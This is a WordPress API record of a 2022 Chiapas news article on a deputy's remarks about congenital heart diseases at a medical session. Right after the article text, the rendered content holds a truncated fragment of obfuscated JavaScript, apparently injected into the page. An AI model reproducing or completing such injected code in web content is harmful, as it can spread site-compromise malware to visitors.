{"id":3517,"date":"2022-07-11T23:38:02","date_gmt":"2022-07-11T23:38:02","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=3517"},"modified":"2022-07-11T23:38:03","modified_gmt":"2022-07-11T23:38:03","slug":"capacitacion-difusion-y-concientizacion-para-atender-enfermedades-congenitas-veronica-alcazar","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=3517","title":{"rendered":"Capacitaci\u00f3n, difusi\u00f3n y concientizaci\u00f3n para atender enfermedades cong\u00e9nitas: Ver\u00f3nica Alc\u00e1zar"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220711-WA0053.jpg\" alt=\"\" class=\"wp-image-3518\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220711-WA0053.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220711-WA0053-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220711-WA0053-768x576.jpg 768w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Tuxtla Guti\u00e9rrez, Chiapas a 11 de julio de 2022.- La diputada Ver\u00f3nica Alc\u00e1zar Cordero particip\u00f3 en la segunda sesi\u00f3n cient\u00edfica 2022 que se realiz\u00f3 en San Crist\u00f3bal de Las Casas con el tema central: \u201cEnfermedades cong\u00e9nitas y hereditarias del coraz\u00f3n y aorta\u201d, en donde destac\u00f3 la importancia de la capacitaci\u00f3n al personal m\u00e9dico para la detecci\u00f3n oportuna, campa\u00f1as de difusi\u00f3n y concientizaci\u00f3n, y por supuesto la voluntad del Gobierno del Estado en atender estos padecimientos.Cabe destacar que la diputada por MORENA fue invitada al evento cient\u00edfico y acad\u00e9mico por el DR. Jorge Coss\u00edo Aranda, presidente de la Sociedad Mexicana de Cardiolog\u00eda, donde expuso sus argumentos junto a la Dra. Socorro Negrete, presidenta de la Asociaci\u00f3n Mexicana de Enfermedades Raras, (AMAER), y la Dra. Cristina Sesman Bernal, responsable de la Cl\u00ednica de Enfermedades Lisosomales.En el simposium, se inform\u00f3 que Chiapas ocupa los primeros lugares en el pa\u00eds con enfermedades cong\u00e9nitas del coraz\u00f3n, producto de la endogamia entre las comunidades ind\u00edgenas.Estas enfermedades -subray\u00f3 la diputada Ver\u00f3nica Alc\u00e1zar Cordero- pueden afectar el sistema esquel\u00e9tico, h\u00edgado, bazo, ri\u00f1ones, el sistema nervioso central, el m\u00fasculo esquel\u00e9tico, y por supuesto el Sistema Cardiovascular.Por esa raz\u00f3n, puntualiz\u00f3 la legisladora, es importante poner en la mesa de di\u00e1logo a las enfermedades raras o de baja prevalencia, sin duda este espacio es un escenario valioso para continuar con los trabajos de sensibilizaci\u00f3n y visibilizaci\u00f3n de estos temas.*En ese sentido, Alc\u00e1zar Cordero reconoci\u00f3 el esfuerzo y sensibilidad de los especialitas y personal m\u00e9dico altruista que se sum\u00f3 en este encuentro donde se realizaron estudios a m\u00e1s de 500 infantes para darle seguimiento necesario a cada uno de los casos, acciones acertadas y necesarias para personas vulnerables que padecen estas enfermedades**Asimismo, record\u00f3 que en Chiapas se han dado pasos importantes en este sentido, como el 1er Foro Estatal de Enfermedades Raras, capacitando a las y los m\u00e9dicos Chiapanecos, evento presidido por el gobernador Rutilio Escand\u00f3n Cadenas quien gracias a su apoyo y esp\u00edritu humanitario en la entidad se han dado avances importantes en el tema*Finalmente reiter\u00f3 que, desde la Sexag\u00e9sima Octava Legislatura, continuar\u00e1n los trabajos de difusi\u00f3n e informaci\u00f3n de estos temas. La suma de voluntades va permitir que como sociedad continuemos avanzando a un mejor porvenir para todas y todos los ni\u00f1os que tienen esta alegr\u00eda por vivir.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Tuxtla Guti\u00e9rrez, Chiapas a 11 de julio de 2022.- La diputada Ver\u00f3nica Alc\u00e1zar Cordero particip\u00f3 en la segunda sesi\u00f3n cient\u00edfica 2022 que se realiz\u00f3 en San Crist\u00f3bal de Las Casas con el tema central: \u201cEnfermedades cong\u00e9nitas y hereditarias del coraz\u00f3n y aorta\u201d, en donde destac\u00f3 la importancia de la capacitaci\u00f3n al personal m\u00e9dico para la &hellip;<\/p>\n","protected":false},"author":2,"featured_media":3518,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-3517","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3517","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3517"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3517\/revisions"}],"predecessor-version":[{"id":3519,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3517\/revisions\/3519"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/3518"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3517"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3517"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3517"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}